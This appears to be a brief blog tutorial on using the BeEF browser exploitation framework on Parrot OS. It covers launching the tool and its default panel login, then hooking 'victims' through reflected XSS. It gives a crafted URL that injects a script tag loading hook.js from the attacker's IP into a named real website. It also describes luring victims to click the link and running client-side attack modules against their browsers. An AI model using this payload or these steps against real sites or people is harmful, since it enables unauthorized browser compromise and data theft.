BeEF ( The Browser Exploitation Framework ) is a tool that performs security tests on the web browser. Beef makes a client-based attack and just focused to browser. You can find detailed information here( http://beefproject.com/ ).
Beef is based on kali linux and parrot. You can look at how it is set up in other system (https://github.com/beefproject/beef/wiki/Installation).
Now let’s look at the use of the Beef Framework with the Reflected XSS attack. Firstly let’s run the beef from the terminal. You can also run it from the Applications> Exploitation>Beef Xss Framework tab. ( I will do it on Parrot Sec. OS)
With the cd /usr/share/beef-xss command we come to the directory where the beef is found and we run beef with the command ./beef .
And we log in panel with this url :
( Default username: beef, password : beef )
When we look at the Beef interface; we can see online and offline victim in left side. Now we find a victim with using Reflected XSS. We can do this in 2 ways:
- We can add a script to url to we found xss vulnerability on any website. Let’s say this site has a xss vulnerability we can add this script on URL;
http://alibaba.com/search.php?searchitem=laptop http://alibaba.com/search.php?searchitem=<script src="https:// My IP /hook.js"></script>
We are trying to victim click on the URL..
2. Beef have a wonderful default pages( demos/bucther/index.html )
This public access will not be provided .( You need to do extra processing to do this. External ip routing, modem settings, port opening, etc… You can risk your safety. ) But may work on the local network.
If victim clicked our link we will see in the left side.
We can find the important information about the victim from Details tab and we can look at victim log from Logs tab. We will using many client-based attacks from Commands tab.
There are many commands on this tab. We can look at command status and use it.
Now let’s make a simple joke:
You can use in many cliend-based attack modules in BeEF Framework.
( https://github.com/beefproject/beef/tree/master/modules )